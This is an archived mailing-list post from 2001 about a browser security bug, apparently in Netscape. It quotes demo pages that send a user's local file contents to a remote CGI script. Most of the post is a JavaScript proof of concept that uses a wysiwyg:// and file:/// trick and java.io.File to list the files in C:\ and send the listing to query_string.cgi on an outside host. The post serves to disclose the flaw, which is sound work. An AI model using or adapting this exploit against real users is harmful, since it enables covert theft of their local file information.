> I've whipped up a couple of demos of this bug that send the contents to a > cgi. There is a windows version that I know works, and a unix version I > can't test because my linux box is down (it's a hardware thing). This is > for anyone who has doubts.... > > http://www.kics.bc.ca/~trev/cgi-bin/test.html (Windoze) > > http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (UNIX) > > And yes, it can email it to you if you like :) And if you wish, it can even read your directory structure: (works for Win, but Unix should be straightforward) //slight change of Trev's script: <SCRIPT> alert("List your files in C:\\ and it will be sent to a cgi script."); sl=window.open("wysiwyg://1/file:///C|/"); sl2=sl.window.open(); sl2.location="javascript:s='<SCRIPT>b=\"\";var f = new java.io.File(\"C:\\\\\\\\\"); var fl=f.list(); i=0; while(i < fl.length) {b += fl[i]+\"\\\\n\"; i++;}w=window.open(\"http://www.kics.bc.ca/~trev/cgi-bin/query_string.cgi?\"+escape(b));</'+'SCRIPT>'"; </SCRIPT> At least it seems it can not *write* to local files, I get a security exception when I try that.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:24:18 PDT